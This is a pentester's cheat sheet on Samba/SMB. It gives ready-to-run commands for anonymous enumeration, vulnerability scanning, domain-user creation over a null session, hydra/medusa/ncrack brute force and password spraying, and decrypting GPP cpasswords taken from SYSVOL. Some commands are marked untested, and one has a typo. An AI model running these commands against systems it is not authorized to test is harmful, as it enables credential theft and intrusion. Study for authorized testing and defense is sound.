Samba / SMB – port 445 / 139

Samba is a re-implementation of the SMB networking protocol that provides file and print services for various Microsoft Windows clients. Commonly included as a basic system service on Unix-based operating systems. The name Samba comes from SMB (Server Message Block), the name of the standard protocol used by the Microsoft Windows network file system.

• Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
• Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet

Tools: Nmap, smbclient, crackmapexec, rpcclient, nbtscan, impacket-smbclient, Hydra, rcpclient

💡 Download sensitive information with Manspider.

Enumeration

💡 Scan for SMB shares using Crackmapexec.

crackmapexec

Get machine name, domain and OS.

crackmapexec smb $IP

Usernames & Groups

-U [DOMAIN/]USERNAME[%PASSWORD]

rpcclient -N -U "" -c=enumdomusers $IP
rpcclient -N -U "" -c=enumdomusers $IP
rpcclient -N -U "" -c=enumdomgroups $IP
rpcclient -N -U "" -c="querygroup 0x200" # Change group id
rpcclient -N -U "" -c="queryuser myprecious" # Change username
rpcclient -N -U "" -c=enumprivs $IP

createdomuser myprecious
setuserinfo2 myprecious 24 Pr3cious@1
enumdomusers

smbclient

To find Samba version, start WireShark and then list shares. Follow TCP Stream to see Samba version.

smbclient -N -L $IP -U ""

smbclient -L $IP -U "${DOMAIN}/${USER}"
smbclient -L $IP -U "${DOMAIN}/${USER}%${PASS}"

nmap scripts

IP=x.x.x.x
ls -la /usr/share/nmap/scripts/smb*

nmap -sV -p 139,445 --script=smb-brute* -d $IP -oA nmap-smb-brute

Very long to run and might be blocked after a while.

nmap -Pn -sV -p 139,445 --script=smb* $IP -oA nmap-smb

nmap -Pn -sV -p 139,445 --script "smb* and not brute" $IP -oA nmap-smb

Nmap scan for SMB vulnerabilities

nmap -Pn -sV -p 139,445 --script=smb-vuln* -d $IP -oA nmap-smb-vuln

nmap -Pn -sV -p 139,445 --script=smb-vuln* --script-args=smbdomain=${DOMAIN},smbusername=${USER},smbpassword=${PASS} -d $IP -oA nmap-smb-vuln

nbtscan

When no one is logged into the computer, “User” will be the same as the computer name in “NetBIOS Name”.

# shows the user currently logged in (get the username)
nbtscan -r x.x.x.1-254

nbtscan -r -f IPs.txt

Use Metasploit to get information on smb shares

msfconsole
search scanner/smb
use auxiliary/scanner/smb/smb_enumshares
show options
set RHOSTS x.x.x.x
msf5 auxiliary(scanner/smb/smb_enumshares) > run

[+] x.x.x.x:445      - ADMIN$ - (DISK) Remote Admin
[+] x.x.x.x:445      - C$ - (DISK) Default share
[+] x.x.x.x:445      - IPC$ - (IPC) Remote IPC

Enum4Linux

See Enum4Linux.

Vulnerabilities

• EternalRed / SambaCry (CVE-2017-7494).
• EternalBlue (CVE-2017-0144 / MS17-010)
• Samba RCE (CVE-2008-4250 / MS08-067)

SMB Null Session

Old Microsoft Windows can be vulnerable to SMB Null Session. A session between 2 computers without a username and password was used for failover, so it will send all the information…

See SMB and Null Sessions: Why Your Pen Test is Probably Wrong.

• Microsoft Windows SMB NULL Session Authentication (Tenable)

smbclient -L $IP -U ""

rpcclient

rpcclient is used to connect to netbios port

Can Pass-the-Hash with “–pw-nt-hash”

# -U: user
rpcclient -U "" $IP
[don't enter a password]

# Log as anonymous user
rpcclient -U "" -N $IP

Brute force credentials

IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt

Hydra

*** BEST OPTION ***

hydra -l "Administrator" -p "Password123" -t 1 $IP smb

hydra -L users.txt -P $WL -t 1 $IP smb

To validate when providing a share name. NOT TESTED YET.

hydra -t 1 -V -f -l administrator -P $WL smb://${IP}:445/ADMIN$

nmap scripts

NOTE: There is no warning or error message when the files are not found.

NOT WORKING YET… 🙁

nmap -p 139,445 --script=smb-brute --script-args smblockout=true,userdb=users.txt,passdb=${WL} $IP

Medusa

medusa -h $IP -u administrator -P $WL -M smbnt

Ncrack

ncrack -u administrator -P $WL smb://${IP}/ADMIN$

bash loop with smbclient

# Brute force password for administrator account
for PASSWORD in $(cat $WL); do echo $PASSWORD >> /root/smb.txt; smbclient //${IP}/Users "${PASSWORD}" -U administrator >> /root/smb.txt; done;

# Check progress
cat /root/smb.txt | grep -v NT_STATUS_LOGON_FAILURE | wc -w

password spray with rpcclient

NOT TESTED, BASED ON OTHER WEBSITE

PASSWORD="Abc123"
for u in `cat domain-users.txt`; do
    echo -n "[*] user: $u" && rpcclient -U "${u}%${PASSWORD}" -c "getusername;quit" $IP
done

Access Samba shares

*** Best option *** See smbclient.

💡 Download sensitive information with Manspider.

rpcclient

After connecting

# Show all available commands
help

srvinfo
get

# Domain password policy info
getdompwinfo
getusrdompwinfo <rid of user>

# Enumerate domain users
enumdomusers

# Query Specific User Information (including computers) by RID
queryuser <rid of user>

# Enumerate domain groups
enumdomgroups

# Group information and group membership
querygroup <rid of group>

With GUI

Open explorer window
Click on "+ Other Locations"
Connect to server
smb://smbserver/users_01$/username
Click Register User
Domain: DOMAIN_NAME

smb://smbserver.domain/folder1/folder2/etc

With GUI – Kali

Open a Folder window in Kali. Click on Go->Open Location.

smb://user@${IP}/${SHARE}

smb://x.x.x.x/ADMIN$
smb://x.x.x.x/C$
smb://x.x.x.x/Data
smb://x.x.x.x/IPC$
smb://x.x.x.x/Secure$
smb://x.x.x.x/Users

SYSVOL

Passwords in SYSVOL

• Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
• Group Policy Preferences
• AES Decryption Key (Microsoft)

Groups.xml may contain cpassword. Download all the SMB share content. See smbclient.

Credential Storage in Group Policy Preferences (GPP)

When a new GPP is created, there is an associated XML file created in SYSVOL with the relevant configuration data and if there is a password provided, it is AES-256 bit encrypted. Microsoft published the AES private key on MSDN which can be used to decrypt the password.

Search XML files containing “cpassword” which is the value that contains the AES encrypted password. Use gpp-decrypt (already installed in Kali).

Use this script to find GPP.

grep -Ri "cpassword" .

gpp-decrypt <cpassword>

Use custom script decrypt_cpassword.py. Update cpassword in script, let the key as is.

Read .pol files

sudo pip3 install regpol

find . -name *.pol

regpol Registry.pol

SMB server on Kali Linux

💡 Use impacket-smbserver.

How to configure Samba server in Kali Linux

NOT TESTED

apt install samba
cd /etc/samba/
ls
rm -rf smb.conf {To delete this smb.conf old file}
touch smb.conf {To create smb.conf enpty file}
ls
cat smb.conf {To check the content}
nano smb.conf {To write the content}
smbpasswd -a root {To create the password}
service smbd start {To restart the service of samba}
service nmdb start {To restart the service of samba}
cat /etc/samba/smb.conf {To Check the content}
cd
pwd

SCF File Attacks

See SMB Share – SCF File Attacks (pentestlab).